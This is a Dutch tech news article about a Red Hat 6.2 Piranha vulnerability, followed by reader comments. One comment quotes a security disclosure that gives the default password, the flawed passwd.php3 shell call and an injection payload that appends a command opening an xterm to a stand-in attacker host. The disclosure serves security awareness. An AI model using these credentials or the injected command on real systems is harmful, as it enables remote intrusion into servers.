Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 44 reacties
Bron: WebWereld

Voor de verandering is er nu ook eens een grote bug gevonden in Red Hat Linux, in Piranha zit een bug die ervoor zorgt dat je achter de wachtwoord-string commando's kan plakken die dan op webserver niveau worden uitgevoerd :

Internet Security Systems (ISS) heeft voor de achterdeur in Red Hat Linux 6.2 gewaarschuwd. Piranha is een reeks programma's die het beheer van een website vereenvoudigen. Via een wachtwoord zijn allerhande beheertaken online uit te voeren. Red Hat raadt gebruikers aan een patch te downloaden die het bedrijf via zijn website beschikbaar heeft gesteld.

Een tweede probleem, eveneens met de Piranha-software, levert een serieuzer gevaar op. Een indringer die de Piranha-console benadert kan het wachtwoord veranderen. Aan het eind van deze wachtwoord-string kan een reeks commando's worden toegevoegd. Deze commando's kunnen op hetzelfde niveau als de webserver zelf veranderingen aanbrengen op de server.

"Dit is een groot risico", zegt ISS. "Kwaadwillende gebruikers krijgen dezelfde rechten als de webserver zelf, inclusief schrijfrechten. Een e-commercesite kan op deze manier zijn hele klantendatabase weggeven, of de pagina's van een website kunnen worden overschreven."

Mensen die deze tools toevallig hebben geinstalleerd kunnen hier de update downloaden die dit probleem fixt .

Moderatie-faq Wijzig weergave

Reacties (44)

dvis2:

ik weet niet waar jij die data vandaan haalt, maar dit probleem speelde al een aantal dagen voor de patch. In ieder geval ging via de mailinglist van securityfocus.com al 3 dagen geleden de volgende mail rond:

Hi,

In the interest of full disclosure (I used an alias the last few times,
let's see how this goes as me) here are the details of the piranha
vulnerability. RE: ISS Security Advisory iss.00-04-23.Piranha

To summarize, piranha is a GUI tool for monitoring, configuring, and
administering an LVS cluster. The Redhat 6.2 package piranha-0.4.12
supports web-based php3 interface which is protected by basic
authentication. A default account is provided, that if known, would allow
remote users to change the piranha password as well as run arbitrary
commands on the web server by exploiting a hole in the passwd.php3 script.

First the IDS Signature to detect the attack: http://whitehats.com/IDS/272

(See http://whitehats.com/ids for basic information about using signatures to detect attacks on your network.)

Now the exploit: There are basically two problems with the piranha-0.4.12 package, that when combined yield shell access for an attacker. The reason earlier
versions are not vulnerable is because of the shift away from the gui, towards a web-based php3 interface.

The first problem is the default account and password that protect the web directory containing the administrative php3 scripts. This is what ISS called a "backdoor" - which is actually a default password. (If ISS found something other than what I found, please email me...)

The default username/password is: piranha/q

Now the ironic part is, the second part of the vulnability lies within the program that is used to change the password! By default this is installed into /home/httpd/html/piranha/secure as passwd.php3, or:

http://victim.example.com/piranha/secure/passwd.php3
victim.example.com/piranha/secure/passwd.php3
victim.example.com/piranha/secure/passwd.php3

Once you authenticate (see first vulnerability), a form will come up asking for the new password. To avoid typo-regret, you must enter the password twice. It will then proceed to change the piranha password to
whatever you provided as the new password. It does this by passing your input to a shell command without filtering for metacharacters...

passwd.php3:
echo "The passwords you supplied match";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;

As one can see, this allows for more creative "new passwords", such as this one:

g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;

Example exploit URL (requires authentication):

--
Max Vision Network Security <vision@whitehats.com>
Network Security Assessment
100% Success Rate : Penetration Testing & Risk Mitigation
Free Visibility Analysis and Price Quote for Your Network

(overigens is die patch er alsnog sneller dan het gemiddelde servicepack van windows :)
* DF040F Paz
Nou het is weer leuk te zien dat de meeste Linux freaks gewoon domme napraters zijn ...
Ik kan jullie garanderen dat M$ ook supersnel is met patches ... schrijf je eens in op de mailling lists van zowel NTbugtraq + M$ Security bulletin ... dan zie je bugs gereport worden op bugtraq en ff later meteen een patch available van Billy boy .... meestal een paar uur, soms een dag later ...
Of je nou windohoos, linux, freebsd of OS/2 draait, je moet gewoon altijd een zooi patches installeren voordat je alle 'bekende' gaten dicht hebt...
dit is de goede link:
www.webwereld.nl/nav/n?4268

Dat de patch nu beschikbaar is, is gewoon perfect. Zo hoort het :)

Fouten zijn pas erg op het moment dat er ook daadwerkelijk misbruik van wordt gemaakt. En dat kan nu mooi niet, mits de systeembeheerder een beetje vlot is.
Detect-Fix tijd zou eigenlijk Publicly Reported-Fix tijd moeten zijn.....
Wie zegt dat een hacker die fout niet eerder heeft gevonden?
Tja, storm in een glas water dit gezever. Zoals iemand op /. terecht opmerkte: als iemand zonder de default passwords te wijzigen een server online zet, dan moet die server helemaal niet online zijn. De 2e bug van de commando's achter de wachtwoord string is een typische unix flaw die 10 jaar geleden al in sendmail zat. Dat is wel een beetje raar dat mensen nu nog steeds dezelfde fouten maken bij het programmeren. :).

Het gedrein over wie sneller is met security fixes is niet aan de orde: MS heeft een QA layer die eerst alles moet testen alvorens een fix de deur uit gaat. Er werken namelijk nogal wat meer mensen met windows dan met redhat. Dat kost maximaal een dag extra. Het was schrikbarend erg een aantal jaren terug maar tegenwoordig zit er nauwelijks een dag tussen de bug ontdekking EN report naar MS en een fix. Indien een fix niet 1 2 3 mogelijk is (niet dom kijken, dat is zeker wel mogelijk) dan kost het langer. Ook bij RH en andere os-en. Sun leverde laatst een fix af voor een security lek wat al 1.5 jaar open stond.

Schrikbarender vind ik zelf het feit dat de OSS movement altijd claimt dat Open Source VEILIGER is omdat er zoveel mensen naar de source kijken. Nou.... naar deze source hebben echt 0.0 mensen gekeken alvorens hij in de distro werd toegevoegd. Deze bug is namelijk ontdekt door naar de source te kijken. Kan gebeuren, maar ik denk dat RHat (die al veel doet om QA in te voeren) en andere distro's er goed aan doen MEER of iig IETS aan QA te gaan doen alvorens distributies de wereld in te sturen. De piranha software was versie 0.4 dacht ik, dus echt geen final, maar er zijn zat mensen die het willen draaien en dat ook gewoon doen in productie omgevingen.

Last but nog least: de wat is een os discussie: die heeft hier geen ruk mee te maken. Als Wordpad een bug bevat om macro's te executeren (zit er nog steeds in) dan moet dat gepatcht worden. Als een Unix wordt gedistribueerd met een 'handige servershare tool' en die bevat leaks dan moet die tool gepatcht worden. Of dat nu tot het OS behoord of niet, dat boeit niet. Beide keren kan er schade berokkend worden of kunnen mensen wellicht de security omzeilen. HOE dat gebeurt is niet relevant, dat het NIET moet / mag gebeuren staat buiten kijf.

Zo, dat was toch wel een pro-linux posting, nooit gedacht dat ik dat in me had :)
Ik draai Slackware :) op m'n server dus ik heb geen last van de bug. Ik vind het sowieso niet verstandig om oa RedHat, SuSE, Mandrake en nog een aantal andere te gebruiken als server, daarvoor kun je denk ik het best Debian nemen. Mede omdat de laatste stabiele versie verouderd is heb ik voor Slack gekozen op m'n server omdat ik dan niet zoveel hoef te patchen (samba oa). Maar voor een echte mission critical server is het zeker niet verstandig om zo'n "desktop" geoptimaliseerde Linux te gebruiken die zeer snel met opvolgers komt (suse?).
Otis,
</div><div class=b4>Schrikbarender vind ik zelf het feit dat de OSS movement altijd claimt dat Open Source VEILIGER is omdat er zoveel mensen naar de source kijken. Nou.... naar deze source hebben echt 0.0 mensen gekeken alvorens hij in de distro werd toegevoegd. Deze bug is namelijk ontdekt door naar de source te kijken.</div><div class=b1>
* DF040F FlipZ :+
Maar dan is hij dus wel gevonden doordat het open source is ! ;)

</div><div class=b4>De piranha software was versie 0.4 dacht ik, dus echt geen final, maar er zijn zat mensen die het willen draaien en dat ook gewoon doen in productie omgevingen. </div><div class=b1>

IHMO moet je gewoon nooit het nieuwste van het nieuwste willen, vooral niet als het internet gerelateerde software is. "Better save than sorry". Met open source software in het bijzonder vanwege de manier van ontwikkeling.
Flipz:
</div><div class=b4>
FlipZ denkt
Maar dan is hij dus wel gevonden doordat het open source is !
</div><div class=b1>

Maar bij CLOSED source was de hele backdoor nooit ontdekt. :) Nu jij weer.

(* DF040F Otis
Otis,

Bij Closed source software was de bug minder snel ontdekt, maar degene die 'm ontdekt zou hebben zou er sneller kwaad mee doen. De attitude van de Windows hackers is nou eenmaal wat anders dan die van Linux-kernel-source-doorspitters. Hoewel dat ook verandert als Linux populairder wordt.

En ZO snel zijn ze bij M$ nou ook weer niet met bugfixes. Er zitten nog een paar memory overflow exploit bugs in IIS. (tenminste, een half jaar geleden nog wel. Hacken is niet m'n hobby, dus ik heb het niet recent meer geprobeerd) En Visual Studio (met SP3) blijft ook maar over internal compiler errors klagen, maarja, dat soort bugs is nou eenmaaal niet interessant voor de media.

20 jaar open source, en nog bugs in Sendmail. Tsja. De Berkeley TCP/IP stack is ook nog niet helemaal bomvrij, maar toch aardig stabiel. (schijnt de meest stabiele ter wereld te zijn, maar dat heb ik ook maar van een *BSD freak) En daar worden ook nog zo af en toe bugs in gevonden.

Nouja, open source, closed source, het zal me een zorg zijn. Als het maar werkt.

P.S. Otis, stuur me ff een mailtje. 'k ben je e-mail adres kwijt.
Otis,</div><div class=b4>Maar bij CLOSED source was de hele backdoor nooit ontdekt.</div><div class=b1>

Je redeneert dat als de bug tot in alle eeuwigheid nooit ontdekt wordt het ook goed is, dat klopt, maar IMHO is het het beste als de werking van een beveiligingssysteem volledig bekend is bij iedereen, maar dat het gewoon waterdicht is.

maar bij closed source was de hele backdoor nooit ontdekt Doet mij denken aan een gevangenis waarvan één van de deuren niet op slot zit. Het argument van jou (de bewaker) is: "Ja, maar de gevangenen weten niet dat hij niet op slot zit"

Het is toch gewoon het beste om het ding op slot te doen :)

OpenBSD is open source, maar wel het veiligste systeem ter wereld. Een B1 certificaat of zoiets heeft het toch?? En NT heeft een C???
* DF040F FlipZ
Open source is wel degelijk veiliger, deze bug illustreerd dat, want de fix is er al voordat de final uit is. :)

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True